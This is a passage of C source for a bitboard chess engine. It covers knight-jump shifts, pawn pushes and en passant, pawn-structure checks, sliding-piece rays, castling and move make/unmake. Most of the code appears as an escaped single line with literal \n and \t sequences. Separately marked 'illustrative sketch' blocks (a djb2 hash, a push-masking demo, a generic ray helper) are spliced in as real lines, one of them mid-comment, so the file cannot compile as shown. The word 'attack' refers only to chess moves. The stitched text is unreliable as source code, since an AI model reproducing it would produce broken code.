not(FILE_G | FILE_H | RANK_1);\n}\n\nBitboard ENE(Bitboard moving_piece) {\n\t// Move bitboard two spaces east and one space north, nullify 2 left and 1 bottom\n return moving_piece << 10 & not(FILE_A | FILE_B | RANK_1);\n}\n\nBitboard NNW(Bitboard moving_piece) {\n\t// Move bitboard two spaces north and one space west, nullify 2 bottom and 1 
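/*
 * [Illustrative sketch, not part of this engine] hashPosition() above is the
 * classic djb2 string hash applied to the minimal FEN written by toMinFen().
 * The same loop as a standalone function taking any NUL-terminated string
 * (the function name is made up for this example):
 */
static unsigned long djb2_sketch(const char *s) {
	unsigned long hash = 5381;
	int c;
	while ((c = (unsigned char)*s++))
		hash = ((hash << 5) + hash) + c;   /* hash * 33 + c */
	return hash;
}
/* e.g. djb2_sketch("rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq -") */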
right\n return moving_piece << 15 & not(FILE_H | RANK_1 | RANK_2);\n}\n\nBitboard NNE(Bitboard moving_piece) {\n\t// Move bitboard two spaces north and one space east, nullify 2 bottom and 1 left\n return moving_piece << 17 & not(FILE_A | RANK_1 | RANK_2);\n}\n\nBitboard ESE(Bitboard moving_piece) {\n\t// Move bitboard two spaces east and one space south, nullify 2 right and 1 top\n return moving_piece >> 6 & not(FILE_A | FILE_B | RANK_8);\n}\n\nBitboard WSW(Bitboard moving_piece) {\n\t// Move bitboard two spaces west and one space south, nullify 2 left and 1 top\n return moving_piece >> 10 & not(FILE_G | FILE_H | RANK_8);\n}\n\nBitboard SSE(Bitboard moving_piece) {\n\t// Move bitboard two spaces south and one space east, nullify 2 top and 1 left\n return moving_piece >> 15 & not(FILE_A | RANK_7 | RANK_8);\n}\n\nBitboard SSW(Bitboard moving_piece) {\n\t// Move bitboard two spaces south and one space west, nullify 2 top and 1 right\n return moving_piece >> 17 & not(FILE_H | RANK_7 | RANK_8);\n}\n\n// ==============================================================\n// \t\t\t\t\t========= PIECES ==========\n// ==============================================================\n\n// ========== PAWN ===========\n\n// Retrieves all of the pawns on the board as a bitboard\nBitboard getPawns(int board[]) { return getPieces(board, PAWN); }\n\n// Moves pawn one space forward\nBitboard pawnSimplePushes(Bitboard moving_piece, int board[], char color) {\n\tswitch(color) {\n\tcase WHITE:\n\t\t// Bitwise and between the piece movement and empty squares\n\t\treturn north(moving_piece) & getEmptySquares(board);\n\tcase BLACK:\n\t\t// Bitwise and between the piece movement and empty squares\n\t\treturn south(moving_piece) & getEmptySquares(board);\n\t}\n\treturn 0;\n}\n\n// Moves pawn 2 spaces forward\nBitboard pawnDoublePushes(Bitboard moving_piece, int board[], char color) {\n\tswitch(color) {\n\tcase WHITE:\n\t\t// Bitwise and between the piece movement and empty squares\n\t\treturn north(pawnSimplePushes(moving_piece, board, color)) & (getEmptySquares(board) & RANK_4);\n\tcase BLACK:\n\t\t// Bitwise and between the piece movement and empty squares\n\t\treturn south(pawnSimplePushes(moving_piece, board, color)) & (getEmptySquares(board) & RANK_5);\n\t}\n\treturn 0;\n}\n\n// Returns bitwise or of moving pawn one or two space forward\nBitboard pawnPushes(Bitboard moving_piece, int board[], char color) {\n\treturn pawnSimplePushes(moving_piece, board, color) | pawnDoublePushes(moving_piece, board, color);\n}\n\n// Attacks with pawn moving east\nBitboard pawnEastAttacks(Bitboard moving_piece, int board[], char color) {\n\tswitch(color) {\n\tcase WHITE:\n\t\t// White comes from south, therefore moves northeast\n return NE(moving_piece);\n\tcase BLACK:\n\t\t// Black comes from north, therefore moves southeast\n return SE(moving_piece);\n\t}\n\treturn 0;\n}\n\n// Attacks with pawn moving west\nBitboard pawnWestAttacks(Bitboard moving_piece, int board[], char color) {\n\tswitch(color) {\n\tcase WHITE:\n\t\t// White comes from south, therefore moves northeast\n return NW(moving_piece);\n\tcase BLACK:\n\t\t// Black comes from north, therefore moves southeast\n return SW(moving_piece);\n\t}\n\treturn 0;\n}\n\n// Returns bitwise or of attacking east and west with pawn\nBitboard pawnAttacks(Bitboard moving_piece, int board[], char color) {\n\treturn pawnEastAttacks(moving_piece, board, color) | pawnWestAttacks(moving_piece, board, color);\n}\n\n// Captures with pawn\nBitboard pawnSimpleCaptures(Bitboard moving_piece, int 
board[], char color) {\n\t// Bitwise and between the pawn movement and the retrieval of colored pieces from the board\n\treturn pawnAttacks(moving_piece, board, color) & getColoredPieces(board, opponent(color));\n}\n\n// Checks to see if the \"En passant\" maneuver is a valid move\nBitboard pawnEpCaptures(Bitboard moving_piece, Position * position, char color) {\n\t// If the en passant square does not exist, return 0\n\tif (position->epSquare == -1)\n\t\treturn 0;\n\n\tBitboard valid_ep_square = 0;\n\n\t// Get the valid en passant move as a bitboard\n\tswitch(color) {\n\tcase WHITE:\n\t\tvalid_ep_square = index2bb(position->epSquare) & RANK_6;\n\t\tbreak;\n\tcase BLACK:\n\t\tvalid_ep_square = index2bb(position->epSquare) & RANK_3;\n\t\tbreak;\n\t}\n\n\t// Return the pawn attack bitwise anded with the en passant move\n\treturn pawnAttacks(moving_piece, position->board, color) & valid_ep_square;\n}\n\n// Returns the simple capture bitwise or'ed with the en passant capture\nBitboard pawnCaptures(Bitboard moving_piece, Position * position, char color) {\n return pawnSimpleCaptures(moving_piece, position->board, color) | pawnEpCaptures(moving_piece, position, color);\n}\n\n// Returns the bitwise or of capturing or moving forward with a pawn\nBitboard pawnMoves(Bitboard moving_piece, Position * position, char color) {\n\treturn pawnPushes(moving_piece, position->board, color) | pawnCaptures(moving_piece, position, color);\n}\n\n// Checks to see if a pawn is moving 2 spaces forward\nBOOL isDoublePush(int leaving, int arriving) {\n\tif ( (index2bb(leaving)&RANK_2) && (index2bb(arriving)&RANK_4) )\n\t\treturn TRUE;\n\tif ( (index2bb(leaving)&RANK_7) && (index2bb(arriving)&RANK_5) )\n\t\treturn TRUE;\n\treturn FALSE;\n}\n\n// Retrieves the square at which an en passant move is valid\nchar getEpSquare(int leaving) {\n\t// If the pawn is leaving rank 2, then return the square after the square that was left\n\tif (index2bb(leaving)&RANK_2)\n\t\treturn leaving+8;\n\t// If the pawn was leaving rank 7, return the square before the square that was left\n\tif (index2bb(leaving)&RANK_7)\n\t\treturn leaving-8;\n\treturn -1;\n}\n\n// Checks to see if two same-colored pawns are on the same file (i.e. 
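/*
 * [Illustrative sketch, not part of this engine] pawnDoublePushes() above
 * reuses pawnSimplePushes() so that a blocked intermediate square also blocks
 * the two-square advance. The same shift-and-mask idea on a bare 64-bit board
 * (a1 = bit 0, h8 = bit 63; all names below are made up for this example):
 */
#include <stdint.h>
#include <assert.h>

static void doublePushMasking_sketch(void) {
	uint64_t pawnOnE2  = 1ULL << 12;          /* pawn on e2 */
	uint64_t blockerE3 = 1ULL << 20;          /* e3 is occupied */
	uint64_t empty     = ~blockerE3;          /* every other square is empty */
	uint64_t rank4     = 0xFFULL << 24;

	uint64_t singlePush = (pawnOnE2 << 8) & empty;            /* blocked: 0 */
	uint64_t doublePush = (singlePush << 8) & empty & rank4;  /* also 0     */

	assert(singlePush == 0 && doublePush == 0);               /* a blocked pawn cannot jump */
}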
one behind another)\nBOOL isDoubledPawn(Bitboard position, int board[]) {\n\tchar pieceColor = board[bb2index(position)]&COLOR_MASK;\n\n\tif (countPieces( getPawns(board)&getColoredPieces(board, pieceColor)&fileFilter(position) ) > 1)\n\t\treturn TRUE;\n\treturn FALSE;\n}\n\n// Checks to see if a pawn has no friendly pawn on an adjacent file\nBOOL isIsolatedPawn(Bitboard position, int board[]) {\n\tBitboard sideFiles = fileFilter(east(position) | west(position));\n\tchar pieceColor = board[bb2index(position)]&COLOR_MASK;\n\n\tif (countPieces( getPawns(board)&getColoredPieces(board, pieceColor)&sideFiles ) == 0)\n\t\treturn TRUE;\n\treturn FALSE;\n}\n\n// Checks to see if a pawn is behind all same-color pawns on the adjacent files\nBOOL isBackwardsPawn(Bitboard position, int board[]) {\n\t// Fill all elements to the sides of the current position\n\tBitboard squaresFilter = east(position) | west(position);\n\tchar pieceColor = board[bb2index(position)]&COLOR_MASK;\n\n\t// Fill squaresFilter with a ray going towards the opponent from the current position\n\tif ( pieceColor == BLACK ) {\n\t\tsquaresFilter |= northRay(squaresFilter);\n\t} else {\n\t\tsquaresFilter |= southRay(squaresFilter);\n\t}\n\n\t// If no same-colored pieces are in squaresFilter, then the pawn is backwards\n\tif (countPieces( getPawns(board)&getColoredPieces(board, pieceColor)&squaresFilter ) == 0)\n\t\treturn TRUE;\n\treturn FALSE;\n}\n\n// Checks to see if a pawn has no opposing pawns blocking it from reaching the other side of the board\nBOOL isPassedPawn(Bitboard position, int board[]) {\n\tBitboard squaresFilter = 0;\n\tchar pieceColor = board[bb2index(position)]&COLOR_MASK;\n\n\t// Fill a 3 wide ray going towards the opponent from the current position\n\tif ( pieceColor == BLACK ) {\n\t\tsquaresFilter |= southRay(east(position)) | southRay(west(position)) | southRay(position);\n\t} else {\n\t\tsquaresFilter |= northRay(east(position)) | northRay(west(position)) | northRay(position);\n\t}\n\n\t// If no opposite colored pawns are in that ray, the pawn is not opposed\n\tif (countPieces( getPawns(board)&getColoredPieces(board, opponent(pieceColor))&squaresFilter ) == 0)\n\t\treturn TRUE;\n\treturn FALSE;\n}\n\n// Checks to see if there are no pawns on a given file\nBOOL isOpenFile(Bitboard position, int board[]) {\n\tif (countPieces( getPawns(board)&fileFilter(position) ) == 0)\n\t\treturn TRUE;\n\treturn FALSE;\n}\n\n// Checks to see if there is only one pawn on a given file\nBOOL isSemiOpenFile(Bitboard position, int board[]) {\n\tif (countPieces( getPawns(board)&fileFilter(position) ) == 1)\n\t\treturn TRUE;\n\treturn FALSE;\n}\n\n// ========== KNIGHT =========\n\n// Retrieves all knights on the board\nBitboard getKnights(int board[]) { return getPieces(board, KNIGHT); }\n\n// Returns a bitboard containing all of the valid knight attacks from the current location\nBitboard knightAttacks(Bitboard moving_piece) {\n return NNE(moving_piece) | ENE(moving_piece) |\n NNW(moving_piece) | WNW(moving_piece) |\n SSE(moving_piece) | ESE(moving_piece) |\n SSW(moving_piece) | WSW(moving_piece);\n}\n\n// Returns all of the valid attacks that do not already have a same-colored piece in them\nBitboard knightMoves(Bitboard moving_piece, int board[], char color) {\n return knightAttacks(moving_piece) & not(getColoredPieces(board, color));\n}\n\n// Fills all possible squares a knight can hit within a certain number of jumps\nBitboard knightFill(Bitboard moving_piece, int jumps) {\n\t// Start with moving piece\n\tBitboard fill = 
moving_piece;\n\tint i;\n\t// For i < jumps\n\tfor (i=0; i<jumps; i++) {\n\t\t// Find knight attacks from current fill, bitwise or the result onto fill\n\t\tfill |= knightAttacks(fill);\n\t}\n\treturn fill;\n}\n\n// Calculates how many moves it will take to reach a square from the current square\nint knightDistance(Bitboard leaving_square, Bitboard arriving_square) {\n\tBitboard fill = leaving_square;\n\tint dist = 0;\n\n\t// While not at the arriving square\n\twhile ((fill & arriving_square) == 0) {\n\t\t// Increment distance (number of moves)\n\t\tdist++;\n\t\t// Add knightAttacks at fill to fill\n\t\tfill |= knightAttacks(fill);\n\t}\n\treturn dist;\n}\n\n// ========== KING ===========\n\n// Gets the location of the king at a given color\nBitboard getKing(int board[], char color) {\n\treturn getPieces(board, KING) & getColoredPieces(board, color);\n}\n\n// Return a bitboard of all king attacks\nBitboard kingAttacks(Bitboard moving_piece) {\n\t// Fill east and west\n\tBitboard kingAtks = moving_piece | east(moving_piece) | west(moving_piece);\n\t// Fill north and south from both\n\tkingAtks |= north(kingAtks) | south(kingAtks);\n\t// Return with center piece removed\n return kingAtks & not(moving_piece);\n}\n\n// Return all king attacks that are not occupied by a same-colored piece\nBitboard kingMoves(Bitboard moving_piece, int board[], char color) {\n return kingAttacks(moving_piece) & not(getColoredPieces(board, color));\n}\n\n// Checks if castling kingside is valid\nBOOL canCastleKingside(Position * position, char color) {\n\tswitch(color) {\n\n\tcase WHITE:\n\t\t// If can castle kingside, all of the pieces are in the right spot, \n\t\t// none of the spaces are under attack, then return true\n\t\tif ( (position->castlingRights&CASTLE_KINGSIDE_WHITE) &&\n\t\t\t (position->board[str2index(\"e1\")] == (WHITE|KING)) &&\n\t\t\t (position->board[str2index(\"f1\")] == EMPTY) &&\n\t\t\t (position->board[str2index(\"g1\")] == EMPTY) &&\n\t\t\t (position->board[str2index(\"h1\")] == (WHITE|ROOK)) &&\n\t\t\t (!isAttacked(str2bb(\"e1\"), position->board, opponent(color))) &&\n\t\t\t (!isAttacked(str2bb(\"f1\"), position->board, opponent(color))) &&\n\t\t\t (!isAttacked(str2bb(\"g1\"), position->board, opponent(color))) )\n\t\t\treturn TRUE;\n\t\telse\n\t\t\treturn FALSE;\n\n\tcase BLACK:\n\t\t// If can castle kingside, all of the pieces are in the right spot, \n\t\t// none of the spaces are under attack, then return true\n\t\tif ( (position->castlingRights&CASTLE_KINGSIDE_BLACK) &&\n\t\t\t (position->board[str2index(\"e8\")] == (BLACK|KING)) &&\n\t\t\t (position->board[str2index(\"f8\")] == EMPTY) &&\n\t\t\t (position->board[str2index(\"g8\")] == EMPTY) &&\n\t\t\t (position->board[str2index(\"h8\")] == (BLACK|ROOK)) &&\n\t\t\t (!isAttacked(str2bb(\"e8\"), position->board, opponent(color))) &&\n\t\t\t (!isAttacked(str2bb(\"f8\"), position->board, opponent(color))) &&\n\t\t\t (!isAttacked(str2bb(\"g8\"), position->board, opponent(color))) )\n\t\t\treturn TRUE;\n\t\telse\n\t\t\treturn FALSE;\n\n\t}\n\treturn FALSE;\n}\n\n// Checks if castling queenside is valid\nBOOL canCastleQueenside(Position * position, char color) {\n\tswitch(color) {\n\n\tcase WHITE:\n\t\t// If can castle queenside, all of the pieces are in the right spot, \n\t\t// none of the spaces are under attack, then return true\n\t\tif ( (position->castlingRights&CASTLE_QUEENSIDE_WHITE) &&\n\t\t\t (position->board[str2index(\"a1\")] == (WHITE|ROOK)) &&\n\t\t\t (position->board[str2index(\"b1\")] == EMPTY) &&\n\t\t\t 
(position->board[str2index(\"c1\")] == EMPTY) &&\n\t\t\t (position->board[str2index(\"d1\")] == EMPTY) &&\n\t\t\t (position->board[str2index(\"e1\")] == (WHITE|KING)) &&\n\t\t\t (!isAttacked(str2bb(\"c1\"), position->board, opponent(color))) &&\n\t\t\t (!isAttacked(str2bb(\"d1\"), position->board, opponent(color))) &&\n\t\t\t (!isAttacked(str2bb(\"e1\"), position->board, opponent(color))) )\n\t\t\treturn TRUE;\n\t\telse\n\t\t\treturn FALSE;\n\n\tcase BLACK:\n\t\t// If can castle queenside, all of the pieces are in the right spot, \n\t\t// none of the spaces are under attack, then return true\n\t\tif ( (position->castlingRights&CASTLE_QUEENSIDE_BLACK) &&\n\t\t\t\t (position->board[str2index(\"a8\")] == (BLACK|ROOK)) &&\n\t\t\t\t (position->board[str2index(\"b8\")] == EMPTY) &&\n\t\t\t\t (position->board[str2index(\"c8\")] == EMPTY) &&\n\t\t\t\t (position->board[str2index(\"d8\")] == EMPTY) &&\n\t\t\t\t (position->board[str2index(\"e8\")] == (BLACK|KING)) &&\n\t\t\t\t (!isAttacked(str2bb(\"c8\"), position->board, opponent(color))) &&\n\t\t\t\t (!isAttacked(str2bb(\"d8\"), position->board, opponent(color))) &&\n\t\t\t\t (!isAttacked(str2bb(\"e8\"), position->board, opponent(color))) )\n\t\t\treturn TRUE;\n\t\telse\n\t\t\treturn FALSE;\n\n\t}\n\treturn FALSE;\n}\n\n// Removes the right to castle from a piece\nchar removeCastlingRights(char original_rights, char removed_rights) {\n\t// Flips bits of removed rights, bitwise and's it onto the original\n return (char) (original_rights & ~(removed_rights));\n}\n\n// ========== BISHOP =========\n\n// Gets all bishops on the board\nBitboard getBishops(int board[]) { return getPieces(board, BISHOP); }\n\n// Generates a northeastern attack ray from all elements on the passed in bitboard\nBitboard NE_ray(Bitboard bb) {\n\tint i;\n\t// Add first NE ray\n\tBitboard ray = NE(bb);\n\n\t// Add remaining NE rays starting from current ray\n\tfor (i=0; i<6; i++) {\n\t\tray |= NE(ray);\n\t}\n\n\treturn ray & ALL_SQUARES;\n}\n\n// Generates southeastern attack ray from all elements on the passed in bitboard\nBitboard SE_ray(Bitboard bb) {\n\tint i;\n\t// Add first SE ray\n\tBitboard ray = SE(bb);\n\n\t// Add remaining SE rays\n\tfor (i=0; i<6; i++) {\n\t\tray |= SE(ray);\n\t}\n\n\treturn ray & ALL_SQUARES;\n}\n\n// Generates northwestern attack ray from all elements on the passed in bitboard\nBitboard NW_ray(Bitboard bb) {\n\tint i;\n\t// Add first NW ray\n\tBitboard ray = NW(bb);\n\n\t// Add remaining NW rays\n\tfor (i=0; i<6; i++) {\n\t\tray |= NW(ray);\n\t}\n\n\treturn ray & ALL_SQUARES;\n}\n\n// Generates southwestern attack ray from all elements on the passed in bitboard\nBitboard SW_ray(Bitboard bb) {\n\tint i;\n\t// Add first SW ray\n\tBitboard ray = SW(bb);\n\n\t// Add remaining SW rays\n\tfor (i=0; i<6; i++) {\n\t\tray |= SW(ray);\n\t}\n\n\treturn ray & ALL_SQUARES;\n}\n\n// Generates northeastern attack ray from the location of the piece\nBitboard NE_attack(Bitboard single_piece, int board[], char color) {\n\t// Find pieces blocking the attack\n\tBitboard blocker = lsb(NE_ray(single_piece) & getOccupiedSquares(board));\n\n\t// If there is a blocker, return the ray of the piece xor'd with the ray of the blocker\n\tif (blocker) {\n\t\treturn NE_ray(single_piece) ^ NE_ray(blocker);\n\t} else {\n\t\treturn NE_ray(single_piece);\n\t}\n}\n\n// Generates northwestern attack ray from the location of the piece\nBitboard NW_attack(Bitboard single_piece, int board[], char color) {\n\t// Find pieces blocking the attack\n\tBitboard blocker = lsb(NW_ray(single_piece) 
& getOccupiedSquares(board));\n\n\t// If there is a blocker, return the ray of the piece xor'd with the ray of the blocker\n\tif (blocker) {\n\t\treturn NW_ray(single_piece) ^ NW_ray(blocker);\n\t} else {\n\t\treturn NW_ray(single_piece);\n\t}\n}\n\n// Generates southeastern attack ray from the location of the piece\nBitboard SE_attack(Bitboard single_piece, int board[], char color) {\n\t// Find pieces blocking the attack\n\tBitboard blocker = msb(SE_ray(single_piece) & getOccupiedSquares(board));\n\n\t// If there is a blocker, return the ray of the piece xor'd with the ray of the blocker\n\tif (blocker) {\n\t\treturn SE_ray(single_piece) ^ SE_ray(blocker);\n\t} else {\n\t\treturn SE_ray(single_piece);\n\t}\n}\n\n// Generates southwestern attack ray from the location of the piece\nBitboard SW_attack(Bitboard single_piece, int board[], char color) {\n\t// Find pieces blocking the attack\n\tBitboard blocker = msb(SW_ray(single_piece) & getOccupiedSquares(board));\n\n\t// If there is a blocker, return the ray of the piece xor'd with the ray of the blocker\n\tif (blocker) {\n\t\treturn SW_ray(single_piece) ^ SW_ray(blocker);\n\t} else {\n\t\treturn SW_ray(single_piece);\n\t}\n}\n\n// Return attack vectors along the sw-ne vector\nBitboard diagonalAttacks(Bitboard single_piece, int board[], char color) {\n return NE_attack(single_piece, board, color) | SW_attack(single_piece, board, color);\n}\n\n// Return attack vectors along the nw-se vector\nBitboard antiDiagonalAttacks(Bitboard single_piece, int board[], char color) {\n return NW_attack(single_piece, board, color) | SE_attack(single_piece, board, color);\n}\n\n// Return both diagonal and anti-diagonal attacks\nBitboard bishopAttacks(Bitboard moving_pieces, int board[], char color) {\n return diagonalAttacks(moving_pieces, board, color) | antiDiagonalAttacks(moving_pieces, board, color);\n}\n\n// Return all bishop attacks that are not occupied by friendly pieces\nBitboard bishopMoves(Bitboard moving_piece, int board[], char color) {\n return bishopAttacks(moving_piece, board, color) & not(getColoredPieces(board, color));\n}\n\n// ========== ROOK ===========\n\n// Find all rooks on the board\nBitboard getRooks(int board[]) { return getPieces(board, ROOK); }\n\n// Generates northern attack ray for all elements on passed-in board\nBitboard northRay(Bitboard moving_pieces) {\n\t// Add first N ray\n Bitboard ray_atks = north(moving_pieces);\n\n int i;\n\t// Add remaining N rays\n for (i=0; i<6; i++) {\n ray_atks |= north(ray_atks);\n }\n\n return ray_atks & ALL_SQUARES;\n}\n\n// Generates southern attack ray for all elements on passed-in board\nBitboard southRay(Bitboard moving_pieces) {\n\t// Add first S ray\n Bitboard ray_atks = south(moving_pieces);\n\n int i;\n\t// Add remaining S rays\n for (i=0; i<6; i++) {\n ray_atks |= south(ray_atks);\n }\n\n return ray_atks & ALL_SQUARES;\n}\n\n// Generates eastern attack ray for all elements on passed-in board\nBitboard eastRay(Bitboard moving_pieces) {\n\t// Add first E ray\n Bitboard ray_atks = east(moving_pieces);\n\n int i;\n\t// Add remaining E rays\n for (i=0; i<6; i++) {\n ray_atks |= east(ray_atks);\n }\n\n return ray_atks & ALL_SQUARES;\n}\n\n// Generates western attack ray for all elements on passed-in board\nBitboard westRay(Bitboard moving_pieces) {\n\t// Add first W ray\n Bitboard ray_atks = west(moving_pieces);\n\n int i;\n\t// Add remaining W rays\n for (i=0; i<6; i++) {\n ray_atks |= west(ray_atks);\n }\n\n return ray_atks & ALL_SQUARES;\n}\n\n// Generates northern attack vector from the 
location of the piece\nBitboard northAttack(Bitboard single_piece, int board[], char color) {\n\t// Find pieces blocking the attack\n Bitboard blocker = lsb(northRay(single_piece) & getOccupiedSquares(board));\n\n\t// If there is a blocker, return the ray of the piece xor'd with the ray of the blocker\n if (blocker)\n return northRay(single_piece) ^ northRay(blocker);\n else\n return northRay(single_piece);\n}\n\n// Generates southern attack vector from the location of the piece\nBitboard southAttack(Bitboard single_piece, int board[], char color) {\n\t// Find pieces blocking the attack\n Bitboard blocker = msb(southRay(single_piece) & getOccupiedSquares(board));\n\n\t// If there is a blocker, return the ray of the piece xor'd with the ray of the blocker\n if (blocker)\n return southRay(single_piece) ^ southRay(blocker);\n else\n return southRay(single_piece);\n}\n\n// Returns northern and southern attack vectors\nBitboard fileAttacks(Bitboard single_piece, int board[], char color) {\n return northAttack(single_piece, board, color) | southAttack(single_piece, board, color);\n}\n\n// Generates eastern attack vector from the location of the piece\nBitboard eastAttack(Bitboard single_piece, int board[], char color) {\n\t// Find pieces blocking the attack\n Bitboard blocker = lsb(eastRay(single_piece) & getOccupiedSquares(board));\n\n\t// If there is a blocker, return the ray of the piece xor'd with the ray of the blocker\n if (blocker)\n return eastRay(single_piece) ^ eastRay(blocker);\n else\n return eastRay(single_piece);\n}\n\n// Generates western attack vector from the location of the piece\nBitboard westAttack(Bitboard single_piece, int board[], char color) {\n\t// Find pieces blocking the attack\n Bitboard blocker = msb(westRay(single_piece) & getOccupiedSquares(board));\n\n\t// If there is a blocker, return the ray of the piece xor'd with the ray of the blocker\n if (blocker)\n return westRay(single_piece) ^ westRay(blocker);\n else\n return westRay(single_piece);\n}\n\n// Returns eastern and western attack vectors\nBitboard rankAttacks(Bitboard single_piece, int board[], char color) {\n return eastAttack(single_piece, board, color) | westAttack(single_piece, board, color);\n}\n\n// Returns full set of rook attacks (rank and file attack vectors)\nBitboard rookAttacks(Bitboard moving_piece, int board[], char color) {\n return fileAttacks(moving_piece, board, color) | rankAttacks(moving_piece, board, color);\n}\n\n// Return all valid attacks that are not occupied by a same-colored piece\nBitboard rookMoves(Bitboard moving_piece, int board[], char color) {\n return rookAttacks(moving_piece, board, color) & not(getColoredPieces(board, color));\n}\n\n// ========== QUEEN ==========\n\n// Get all queens on the board\nBitboard getQueens(int board[]) { return getPieces(board, QUEEN); }\n\n// Return queen attacks (combiniation of bishop and rook attacks)\nBitboard queenAttacks(Bitboard moving_piece, int board[], char color) {\n return rookAttacks(moving_piece, board, color) | bishopAttacks(moving_piece, board, color);\n}\n\n// Return queen moves (combination of bishop and rook moves)\nBitboard queenMoves(Bitboard moving_piece, int board[], char color) {\n return rookMoves(moving_piece, board, color) | bishopMoves(moving_piece, board, color);\n}\n\n// ======== MAKE MOVE ========\n\n// ==== Move Piece ====\nvoid movePiece(int board[], Move move) {\n\tboard[getTo(move)] = board[getFrom(move)]; // Take the selected, valid, position for the piece and give it the information from the current 
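/*
 * [Illustrative sketch, not part of this engine] northAttack(), NE_attack() and
 * the other sliding-attack helpers above all follow the same classical pattern:
 * take the full ray, find the first blocker (lsb for rays that grow upward,
 * msb for rays that grow downward), and XOR away everything behind it. The
 * pattern written once, generically, with caller-supplied ray and bit-scan
 * functions (names are made up; magic-bitboard lookup tables are a common
 * faster alternative, not something this engine uses):
 */
#include <stdint.h>

typedef uint64_t BB_sketch;

static BB_sketch rayAttack_sketch(BB_sketch piece, BB_sketch occupied,
                                  BB_sketch (*ray)(BB_sketch),
                                  BB_sketch (*firstBlockerBit)(BB_sketch)) {
	BB_sketch attacks = ray(piece);
	BB_sketch blocker = firstBlockerBit(attacks & occupied);
	return blocker ? attacks ^ ray(blocker) : attacks;   /* cut the ray at the blocker */
}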
position.\n\tboard[getFrom(move)] = EMPTY; // Take the previous position and clear it of all piece data.\n}\n\n// ==== Current position information update ====\nvoid updatePosition(Position * newPosition, Position * position, Move move) {\n\tmemcpy(newPosition, position, sizeof(Position)); // Copy information of selected, valid, position.\n\tint leavingSquare = getFrom(move); // Get coordinates of position piece is on.\n\tint arrivingSquare = getTo(move); // Get coordinates of the destination square.\n\tint piece = position->board[leavingSquare]; // Get the piece information that is stored on the position it is leaving.\n\n\t// ===== MOVE PIECE =====\n\tmovePiece(newPosition->board, move);\n\n\t// ===== TO MOVE =====\n\tnewPosition->toMove = opponent(position->toMove);\n\n\t// ===== MOVE COUNTS =====\n\t// Half move clock takes care of enforcing the fifty-move rule (in this program 75). The count is reset if a capture happens or a pawn moves.\n\tnewPosition->halfmoveClock += 1; // Add one to the count\n\tif (position->toMove == BLACK) { // The fullmove number increases after Black has moved \n\t\tnewPosition->fullmoveNumber += 1;\n\t}\n\n\tif (position->board[arrivingSquare] != EMPTY) {\n\t\tnewPosition->halfmoveClock = 0; // If there is a capture, reset the half move clock\n\t}\n\n\t// ===== PAWNS =====\n\tnewPosition->epSquare = -1;\n\tif ( (piece&PIECE_MASK) == PAWN ) {\n\t\tnewPosition->halfmoveClock = 0; //If a pawn moves, reset the half move clock\n\n\t\tif (arrivingSquare == position->epSquare) {\n\t\t if (index2bb(position->epSquare)&RANK_3) {\n\t\t\t\tnewPosition->board[(int)(position->epSquare+8)] = EMPTY;\n\t\t }\n\n\t\t if (index2bb(position->epSquare)&RANK_6) {\n\t\t \tnewPosition->board[(int)(position->epSquare-8)] = EMPTY;\n\t\t }\n\t\t}\n\n\t\tif (isDoublePush(leavingSquare, arrivingSquare)) {\n\t\t\tnewPosition->epSquare = getEpSquare(leavingSquare);\n\t\t}\n\n\t\tif (index2bb(arrivingSquare)&(RANK_1|RANK_8)) {\n\t\t\tnewPosition->board[arrivingSquare] = position->toMove|QUEEN;\n\t\t}\n\n\t}\n\n\t// ===== CASTLING =====\n\t// Castling rules: \n\t// The king and the rook may not have moved from their starting positions\n\t// All spaces between the king and the rook must be empty\n\t// The king cannot be in check\n\t// The squares the king passes over must not be under attack, nor the square it lands on\n\tif (leavingSquare == str2index(\"a1\")) {\n\t\tnewPosition->castlingRights = removeCastlingRights(newPosition->castlingRights, CASTLE_QUEENSIDE_WHITE);\n\t}\n\telse if (leavingSquare == str2index(\"h1\")) {\n\t\tnewPosition->castlingRights = removeCastlingRights(newPosition->castlingRights, CASTLE_KINGSIDE_WHITE);\n\t}\n\telse if (leavingSquare == str2index(\"a8\")) {\n\t\tnewPosition->castlingRights = removeCastlingRights(newPosition->castlingRights, CASTLE_QUEENSIDE_BLACK);\n\t}\n\telse if (leavingSquare == str2index(\"h8\")) {\n\t\tnewPosition->castlingRights = removeCastlingRights(newPosition->castlingRights, CASTLE_KINGSIDE_BLACK);\n\t}\n\n\tif ( piece == (WHITE|KING) ) {\n\t\tnewPosition->castlingRights = removeCastlingRights(newPosition->castlingRights, (CASTLE_KINGSIDE_WHITE|CASTLE_QUEENSIDE_WHITE));\n\t\tif (leavingSquare == str2index(\"e1\")) {\n\n\t\t\tif (arrivingSquare == str2index(\"g1\"))\n\t\t\t\tmovePiece(newPosition->board, generateMove(str2index(\"h1\"), str2index(\"f1\")));\n\n            if (arrivingSquare == str2index(\"c1\"))\n\t\t\t\tmovePiece(newPosition->board, generateMove(str2index(\"a1\"), str2index(\"d1\")));\n\t\t}\n\t} else if ( piece == 
(BLACK|KING) ) {\n\t\tnewPosition->castlingRights = removeCastlingRights(newPosition->castlingRights, CASTLE_KINGSIDE_BLACK|CASTLE_QUEENSIDE_BLACK);\n\t\tif (leavingSquare == str2index(\"e8\")) {\n\n\t\t\tif (arrivingSquare == str2index(\"g8\"))\n\t\t\t\tmovePiece(newPosition->board, generateMove(str2index(\"h8\"), str2index(\"f8\")));\n\n if (arrivingSquare == str2index(\"c8\"))\n\t\t\t\tmovePiece(newPosition->board, generateMove(str2index(\"a8\"), str2index(\"d8\")));\n\t\t}\n\t}\n}\n\n// ==== Another move function ====\nvoid makeMove(Game * game, Move move) {\n\tPosition newPosition;\n\tupdatePosition(&newPosition, &(game->position), move); // Move the piece to the next position selected\n\tmemcpy(&(game->position), &newPosition, sizeof(Position)); // Copy the memory of the position onto the next position\n\n\tgame->moveListLen += 1; // List of moves made increases\n\n\t// ===== MOVE LIST =====\n\tgame->moveList[game->moveListLen-1] = move;\n\n\t// ===== POSITION HISTORY =====\n\ttoFen(game->positionHistory[game->moveListLen], &game->position); // Stores each move in \"position history\"\n}\n\n// ==== Unmake move (for undo function) ====\nvoid unmakeMove(Game * game) {\n\tPosition newPosition;\n\tif (game->moveListLen >= 1) { // If the user has made at least one move\n\t\t\tloadFen(&newPosition, game->positionHistory[game->moveListLen-1]); // Get the games move history\n\t\t\tmemcpy(&(game->position), &newPosition, sizeof(Position)); // Get the last move made \n\n\t\t\tgame->moveList[game->moveListLen-1] = 0; // Remove that last move from the list of moves\n\t\t\tmemset(game->positionHistory[game->moveListLen], 0, MAX_FEN_LEN*sizeof(char)); // Make the size of the 